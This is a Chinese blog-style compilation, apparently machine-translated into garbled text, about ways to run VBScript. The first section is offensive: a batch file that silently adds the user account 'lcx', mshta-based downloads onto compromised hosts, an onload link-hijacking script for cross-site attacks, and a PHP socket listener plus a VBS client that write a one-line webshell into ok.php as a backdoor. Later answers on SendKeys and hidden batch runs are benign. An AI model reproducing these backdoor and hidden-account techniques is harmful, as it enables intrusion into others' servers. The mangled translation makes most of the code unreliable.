vbscript 如何运行(vbscript如何运行)

vbscript

vbs如何在网页上运行?

vbs有一个类似“SAPI”的对象。SpVoice”,可以用来说英语。默认情况下,该组件可以在xp和2003上使用。打完电话,可以听到一个外国老头在电脑上说话。比如这段代码:●CreateObject(& quot;SAPI。SpVoice & quot).说话& quot我爱你& quot●,另存为vbs后缀,然后双击就能听到英文的我爱你。但是接下来我们谈到了另一个问题,如何运行vbs代码而不保存为vbs或者vbe后缀。

1.使用mshta运行vbs

这类文件hta运行后也是系统权限,它的调用主机是mshta.exe。我们在cmd下运行这行代码:●mshtavsubscript:createobject(” SAPI . sp voice & quot;).说话(& quot我爱你。& quot)(window.close)●,你也会听到同样的发音。这行代码的意思类似于临时生成一个hta文件,然后运行里面的vbs代码,然后调用window.close关闭正在运行的窗口。整个过程看不到hta窗口。你觉得这种操作方式怎么样?至少我想到了两个。一个是批处理的隐藏操作。基本代码如下:

@关闭回声

如果& quot% 1 & quot= = & quoth & quot转到开始

mshta VBScript:createobject(& quot;wscript.shell & quot).运行(& quot% ~ nx0h & quot;,0)(window.close)&退出

:开始

Rem开始写下面的批处理代码。

网络用户lcx 12345 /add

这段代码只能双击运行,运行过程中看不到具体的批处理过程。我考虑的第二件事是在注射过程中的使用。网上有一篇广为流传的文章《mssql注入中多次调用参数导致多次回显的解决方案》。中心思想是用冒号连接vbs语句,然后用echo命令写一次给注入的肉鸡,然后调用这个vbs下载文件。如果调用mshta执行,下载执行一次就可以了。但是在命令行用mshta直接跟vbs代码有一个很难处理的问题:空。不过用execute把vbs代码放在括号里也是可以的。这位读者可以自己试试。相信我,这并不难。

第二,用ie地址栏运行vbs

很多人会用ie地址栏运行js。其实vbs还是可以的。我们就打开一个网站,在地址栏输入:VBScript:msgbox(document . links . length),然后回车。我们将在当前页面上看到有多少连接。使用句子document.links(i)。将I改为不同的自然数,如0、1、2、3等。会分别显示不同的链接地址。这部分其实涉及到dhtml。让我们看看最简单的示例代码:

& lta href = http://www . Sohu . com & gt;www . Sohu . com & lt;/a & gt;

& lta href = http://www . Baidu . com & gt;www . Baidu . com & lt;/a & gt;

这是两个链接。保存为网页后,点击它们会跳转到不同的页面。如果这个页面有一个跨网站,我想破坏它,使用户可以点击www.sohu.com,但去我指定的页面。能做到吗?其实可以只添加一行语句,代码是:●< body onload = VBScript:document . links(0)。href = & quothttp://www . Google . com & quot;:document.links(0)。innerHTML = & quotwww . Sohu . com & quot;& gt●.在这种情况下,用户再次点击搜狐时,实际上会转到谷歌,但原页面的布局丝毫没有受损。相同的dhtml元素包括document.links (i)。href,document.images(i)。src,document.forms(i)。动作等等。跨站点改变它的动态元素很有趣。

第三,调用外部组件运行vbs

毕竟vbs本身功能有限,但是可以和外界很好的互动。如果用vbs模拟nc签约,我们就调用vb组件。关于VBS如何成功呼叫MSWinsock。温索克zzzevazzz说得很清楚。它是。reg导入注册表,用于下载VB6控件的Winsock.ocs注册和授权密钥。这里可以下载两个文件前不久在http://zzzevazzz.bokee.com/inc/vb6controls.rar.,我学了一段时间php,在网上看到一个php监听器,可以当后门。S端s.php代码如下:

& lt一端有带圈可握的短马鞭

//设置一些基本变量

$ host = & quot192 . 168 . 8 . 100 quot;;

$ port = 12345

//设置超时。

set _ time _ limit(0);

//创建一个套接字

$socket = socket_create(AF_INET,SOCK_STREAM,0)或die(& quot;无法创建

插座& quot);

//将套接字绑定到端口

$result = socket_bind($socket,$host,$port)或die(& quot;无法绑定到

插座& quot);

//开始监听链接

$result = socket_listen($socket,3)或die(& quot;无法设置套接字

听众& quot);

//接受传入连接

//另一个套接字来处理通信

$spawn = socket_accept($socket)或die(& quot;无法接受传入

连接& quot);

//获取客户端的输入

$input = socket_read($spawn,1024)或die(& quot;无法读取输入);

//clear 空输入字符串

$ input = trim($ input);//将输入结果写入ok.php,这是我添加的。

fputs(fopen(ok.php,a

),& quot$ input & quot);

//处理客户端输入并返回结果

$output = strrev($input)。& quot& quot;

socket_write($spawn,$output,strlen ($output))或die(& quot;无法写入

输出& quot);

//关闭套接字

socket _ close($ spawn);

socket _ close($ socket);

马鞭& gt

当ie打开这个php时,运行它的服务器会监听12345端口。如果我们使用vbs将合同发送到12345端口,ok.php将在同一个文件的php目录中生成。合同的内容就是我们要写入ok.php的代码。vbs文件c.vbs代码如下:

Set ie=WScript。CreateObject(&quotInternetExplorer。申请& quot)

ie.visible=false

即。导航& quothttp://192 . 168 . 8 . 100/s . PHP & quot;S.php是服务器。

而ie。忙碌的

WScript。睡眠100

Wscript。睡眠200

循环直到ie。ReadyState=4

Set socket=WScript。CreateObject(&quotMSWinsock。Winsock & quot)

插座。协议=0

插座。RemotePort = & quot12345 & quot港口

插座。RemoteHost = & quot192 . 168 . 8 . 100 quot;主机

socket . connect socket . remote host,socket.remoteport连接

WScript.sleep 10

ddd = & quot& lt马鞭phpinfo();& gt& quot&Chr(13)在这里你可以把它改成一句话的php木马

插座。发送数据ddd

WScript.sleep 100

wscript.echo & quot好的& quot

socket.senddata Chr(13)

插座.关闭

设置ie =无

一个vbs和一个php完美匹配,创造了一个非传统的后门。当然这个后门价值不大,重要的是理念。

win10如何查看vbs是否开启?

win10查看vbs是否开启的方法步骤

1.打开win10系统的电脑,然后准备好vbs文件,这里说明一下,所有vbs都可以用记事本打开,不过看到的只是代码,而并不是运行代码的状态,我们要的是vbs真实运行的状态。

2.接着右击vbs文件,在弹出的右键菜单中选择打开方式,有的朋友没有打开方式这个选项,也可以选择属性选项。

3.一般win10系统会自动识别vbs文件,并且自动匹配打开的程序,默认是Microsoft ® Windows Based Script Host,如果自动识别的就可以双击直接运行vbs文件了,没有识别的需要手动来调节。

4.接着说下没有自动匹配程序的情况,同样是在打开方式选择程序的窗口界面,点击下方的更多应用选项。

5.在下方的列表中是没有可以打开的程序,这个时候点击最下面蓝色的文字,也就是在这台电脑上查找其他应用选项,点击打开。

6.接着进入到c盘,然后进入到windowssystem32的文件夹,在里边选择wscript.exe,点击打开即可。

7.接着就可以打开vbs文件了,在桌面可以看到运行的vbs窗口界面了。

用VBS模拟键盘按键?

WshShell.SendKeys “{ENTER}”

模拟键盘操作,将一个或多个按键指令发送到指定Windows窗口来控制应用程序运行。

其使用格式为:object.SendKeys(string);

object:表示WshShell对象;

string:表示要发送的按键指令字符串,需要放在英文双引号中。

https://iknow-pic.cdn.bcebos.com/908fa0ec08fa513dfc8c11a0326d55fbb2fbd9ae

扩展资料:

基本键:

每个按键由一个或多个字符表示。

为了指定单一键盘字符,必须按字符本身的键。例如,为了表示字母 A,可以用 “A”

为了表示多个字符,就必须在字符后面直接加上另一个字符。例如,要表示 A、B 及 C,可用 “ABC” 作为 string。

部分特殊功能键:

对于需要与Shift、Ctrl、Alt三个控制键组合的按键,SendKeys使用特殊字符来表示:

Shift:WshShell.SendKeys “+”

Ctrl:WshShell.SendKeys “^”

Alt:WshShell.SendKeys “%”

+:WshShell.SendKeys “{+}”

VBS运行程序带参数怎么写?

demoDimaa=inputbox(“请键入参数(PleaseInputtheParameter):”,”Configurationtostart”)wscript.createobject(“wscript.shell”).run(“cmd/kipconfig”&a)运行文件和参数直接写在双引号内。

怎样编写VBS程序,在指定的日期、时间内,运行符合的相应程序?怎样修改,谢谢?

思路是这样(但代码我不写了,手机很不方便,而且字数也不够的):首先代码中添加本vbs开机自运行(修改注册表),然后用data函数判断是否指定日期,如果不是则wscript.quit,如果是则再用time函数加do循环判断是否到了指定时间,如果不是则继续循环知道为是,如果是则执行相关命令即可。

怎样写vbs批量运行bat文件?

在VBS中,添加多个需要运行的BAT文件即可,示例:

createobject(“wscript.shell”).run “c:test1.bat”,0 ‘其中0表示bat文件以隐藏窗口的方式运行

createobject(“wscript.shell”).run “c:test2.bat”,0

createobject(“wscript.shell”).run “c:test3.bat”,0

createobject(“wscript.shell”).run “c:test4.bat”,0

……

Published by

风君子

独自遨游何稽首 揭天掀地慰生平